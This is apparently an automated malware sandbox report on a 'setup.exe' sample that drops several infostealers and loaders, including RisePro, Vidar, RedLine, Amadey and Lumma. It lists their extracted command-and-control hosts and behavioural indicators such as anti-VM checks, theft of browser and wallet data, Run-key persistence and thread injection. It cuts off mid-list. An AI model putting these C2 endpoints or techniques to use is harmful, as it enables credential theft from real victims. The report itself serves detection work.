Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06/05/2024, 00:46
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win10v2004-20240419-en
General
-
Target
setup.exe
-
Size
704.0MB
-
MD5
16a058c7a7cbabcedd4f1ccd59db51ff
-
SHA1
da353a3a174dc74477927b5f6a79497e62e48d31
-
SHA256
dfda8888baa718e15240571269d97cc427e56caac906da50fada6f1e4a001d05
-
SHA512
fb50007bce2946a275642d0e9617a272ee71c5c3117ed3600dee94b406d3b4673f066afb6c9b456603f1b35ce8ec5bf75c8777ff8ddfedf6867ea0326d9cff96
-
SSDEEP
98304:ijyRcZlPbzgfcG7rtUbTuen/YAajhYqCYlRMFazcwxLvLbod3+C0yKw8PWRq+s8s:4yObsfcAe9/cjhYa3M4cdJz8epZJ
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000
Extracted
risepro
147.45.47.93:58709
Extracted
stealc
Extracted
vidar
9.4
ad7dbf02afc50b46afd33ddc12f41082
https://steamcommunity.com/profiles/76561199680449169
https://t.me/r1g1o
-
profile_id_v2
ad7dbf02afc50b46afd33ddc12f41082
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.96:28380
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
lumma
https://miniaturefinerninewjs.shop/api
https://acceptabledcooeprs.shop/api
https://obsceneclassyjuwks.shop/api
https://plaintediousidowsko.shop/api
https://sweetsquarediaslw.shop/api
https://holicisticscrarws.shop/api
https://boredimperissvieos.shop/api
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/408-261-0x0000000000400000-0x0000000000646000-memory.dmp family_vidar_v7 behavioral1/memory/408-259-0x0000000000400000-0x0000000000646000-memory.dmp family_vidar_v7 behavioral1/memory/408-250-0x0000000000400000-0x0000000000646000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 9 IoCs
resource yara_rule behavioral1/files/0x000a000000023bdf-118.dat family_zgrat_v1 behavioral1/files/0x000a000000023be4-190.dat family_zgrat_v1 behavioral1/files/0x000a000000023bda-183.dat family_zgrat_v1 behavioral1/memory/912-218-0x0000000000750000-0x00000000007AC000-memory.dmp family_zgrat_v1 behavioral1/memory/1432-215-0x0000000000F60000-0x0000000000FD6000-memory.dmp family_zgrat_v1 behavioral1/memory/4756-239-0x0000000000770000-0x0000000000CEE000-memory.dmp family_zgrat_v1 behavioral1/memory/4664-439-0x0000000000400000-0x0000000000490000-memory.dmp family_zgrat_v1 behavioral1/files/0x0007000000023d7e-991.dat family_zgrat_v1 behavioral1/memory/2744-1062-0x0000000000FD0000-0x000000000104A000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" cixV_nkGTkopkK6M3bv5q2yU.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3936 4192 cmd.exe 201 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/4736-237-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0befa0bcc7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ DzvelfwNBvxbZcdOhY3K.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 78YNmFGpHqyB8VHcAL5S.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cixV_nkGTkopkK6M3bv5q2yU.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 214 4664 MsBuild.exe 218 916 powershell.exe 347 5488 rundll32.exe 352 6600 rundll32.exe 352 6600 rundll32.exe -
pid Process 1004 powershell.exe 2556 powershell.exe 916 powershell.exe 1180 powershell.exe 6988 powershell.exe 2820 powershell.exe 3464 powershell.exe 6480 powershell.exe 7088 powershell.exe 6380 powershell.EXE -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 23 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DzvelfwNBvxbZcdOhY3K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 78YNmFGpHqyB8VHcAL5S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 78YNmFGpHqyB8VHcAL5S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cixV_nkGTkopkK6M3bv5q2yU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cixV_nkGTkopkK6M3bv5q2yU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DzvelfwNBvxbZcdOhY3K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0befa0bcc7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0befa0bcc7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation cixV_nkGTkopkK6M3bv5q2yU.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation LPlVCrUtq4IcBRge6e7zsGdp.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation DzvelfwNBvxbZcdOhY3K.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation explorta.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation Pof_I6pUWTD4eui60EvOnmQb.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation amert.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation f7da420337.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation explorha.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk LPlVCrUtq4IcBRge6e7zsGdp.exe -
Executes dropped EXE 37 IoCs
pid Process 1752 rz7u8wZ2m7geFP2IusKQRQIP.exe 912 upVbA4v1KvTLDndms2No_Axe.exe 1776 cixV_nkGTkopkK6M3bv5q2yU.exe 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 4876 Pof_I6pUWTD4eui60EvOnmQb.exe 1952 cyJLKWRMEWxiogwZ7NScLONr.exe 3564 LQqqtdauwz_TaOPIC8mm6Hjp.exe 2028 PxlH0uZgx12a7zus_o6_h8xG.exe 4756 2MEnKpVWLRc5SpDj8qnnOcHN.exe 4140 oMHmKV4qin2yV3RMkuUNiFFg.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 3864 Ko6SGc1F2vn2SEMSaKcFkL1o.exe 2632 PxlH0uZgx12a7zus_o6_h8xG.tmp 2468 Install.exe 2944 lamexp32.exe 4388 Install.exe 4028 lamexp32.exe 2392 i1.exe 804 bkqtzupkspiy.exe 3840 DzvelfwNBvxbZcdOhY3K.exe 4620 explorta.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 78YNmFGpHqyB8VHcAL5S.exe 6276 amert.exe 6924 Install.exe 7104 EFOewZW4hGAWK7wavcgA.exe 2456 explorha.exe 4672 0befa0bcc7.exe 6956 f7da420337.exe 2744 NivSqBnMcATygKshf_En.exe 6936 explorha.exe 6948 explorta.exe 5584 Install.exe 2664 explorta.exe 2776 explorha.exe 3544 TBRWJhIKnh2MD8sNTiD1rDIz.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Wine explorha.exe -
Loads dropped DLL 6 IoCs
pid Process 1952 cyJLKWRMEWxiogwZ7NScLONr.exe 2632 PxlH0uZgx12a7zus_o6_h8xG.tmp 4756 2MEnKpVWLRc5SpDj8qnnOcHN.exe 5460 rundll32.exe 5488 rundll32.exe 6600 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000a000000023be3-128.dat themida behavioral1/memory/1776-229-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-254-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-257-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-255-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-253-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-241-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-240-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-235-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/memory/1776-517-0x00000000008E0000-0x0000000000EAB000-memory.dmp themida behavioral1/files/0x0009000000023c68-641.dat themida behavioral1/memory/3840-682-0x0000000000D50000-0x0000000001250000-memory.dmp themida behavioral1/memory/4620-726-0x0000000000CF0000-0x00000000011F0000-memory.dmp themida behavioral1/memory/3840-721-0x0000000000D50000-0x0000000001250000-memory.dmp themida behavioral1/files/0x0007000000023d18-751.dat themida behavioral1/memory/704-789-0x0000000000370000-0x00000000009FE000-memory.dmp themida behavioral1/memory/4672-1008-0x0000000000760000-0x0000000000DEE000-memory.dmp themida behavioral1/memory/704-1021-0x0000000000370000-0x00000000009FE000-memory.dmp themida behavioral1/memory/4672-1146-0x0000000000760000-0x0000000000DEE000-memory.dmp themida behavioral1/memory/4620-1257-0x0000000000CF0000-0x00000000011F0000-memory.dmp themida behavioral1/memory/2664-1383-0x0000000000CF0000-0x00000000011F0000-memory.dmp themida behavioral1/memory/2664-1402-0x0000000000CF0000-0x00000000011F0000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 LPlVCrUtq4IcBRge6e7zsGdp.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 LPlVCrUtq4IcBRge6e7zsGdp.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 LPlVCrUtq4IcBRge6e7zsGdp.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Pof_I6pUWTD4eui60EvOnmQb.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Pof_I6pUWTD4eui60EvOnmQb.exe Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Pof_I6pUWTD4eui60EvOnmQb.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" LPlVCrUtq4IcBRge6e7zsGdp.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\\AdobeUpdaterV1.exe" Pof_I6pUWTD4eui60EvOnmQb.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0befa0bcc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\0befa0bcc7.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f7da420337.exe = "C:\\Users\\Admin\\1000021002\\f7da420337.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\\AdobeUpdaterV1.exe" Pof_I6pUWTD4eui60EvOnmQb.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027\\AdobeUpdaterV131.exe" LPlVCrUtq4IcBRge6e7zsGdp.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\\AdobeUpdaterV131.exe" LPlVCrUtq4IcBRge6e7zsGdp.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_90631568f4eda919856d13dba2bc5770 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_90631568f4eda919856d13dba2bc5770\\AdobeUpdaterV131.exe" LPlVCrUtq4IcBRge6e7zsGdp.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\\AdobeUpdaterV1.exe" Pof_I6pUWTD4eui60EvOnmQb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cixV_nkGTkopkK6M3bv5q2yU.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DzvelfwNBvxbZcdOhY3K.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 78YNmFGpHqyB8VHcAL5S.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0befa0bcc7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 146 iplogger.org 147 iplogger.org -
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 ipinfo.io 153 api.myip.com 157 ipinfo.io 253 ipinfo.io 344 ipinfo.io 28 api.myip.com 29 api.myip.com 35 ipinfo.io 295 ipinfo.io 156 api.myip.com 198 ipinfo.io 199 ipinfo.io 212 ipinfo.io 251 ipinfo.io -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023d05-705.dat autoit_exe behavioral1/files/0x0007000000023d8b-1026.dat autoit_exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification C:\Windows\System32\GroupPolicy cixV_nkGTkopkK6M3bv5q2yU.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol cixV_nkGTkopkK6M3bv5q2yU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI cixV_nkGTkopkK6M3bv5q2yU.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini cixV_nkGTkopkK6M3bv5q2yU.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1776 cixV_nkGTkopkK6M3bv5q2yU.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 6276 amert.exe 2456 explorha.exe 6936 explorha.exe 2776 explorha.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1432 set thread context of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 912 set thread context of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 4756 set thread context of 4664 4756 2MEnKpVWLRc5SpDj8qnnOcHN.exe 205 PID 804 set thread context of 3392 804 bkqtzupkspiy.exe 180 PID 804 set thread context of 4108 804 bkqtzupkspiy.exe 183 PID 2744 set thread context of 6968 2744 NivSqBnMcATygKshf_En.exe 272 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\explorta.job DzvelfwNBvxbZcdOhY3K.exe File created C:\Windows\Tasks\butYHpXTvMdZIJsEKZ.job schtasks.exe File created C:\Windows\Tasks\explorha.job amert.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5004 sc.exe 4592 sc.exe 2520 sc.exe 3312 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1148 408 WerFault.exe 113 5700 6924 WerFault.exe 243 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LPlVCrUtq4IcBRge6e7zsGdp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Pof_I6pUWTD4eui60EvOnmQb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Pof_I6pUWTD4eui60EvOnmQb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LQqqtdauwz_TaOPIC8mm6Hjp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LQqqtdauwz_TaOPIC8mm6Hjp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LPlVCrUtq4IcBRge6e7zsGdp.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4628 schtasks.exe 4664 schtasks.exe 6236 schtasks.exe 6136 schtasks.exe 3504 schtasks.exe 1508 schtasks.exe 4360 schtasks.exe 6752 schtasks.exe 5308 schtasks.exe 6988 schtasks.exe 5940 schtasks.exe 6600 schtasks.exe 5724 schtasks.exe 4588 schtasks.exe 4756 schtasks.exe 4524 schtasks.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created 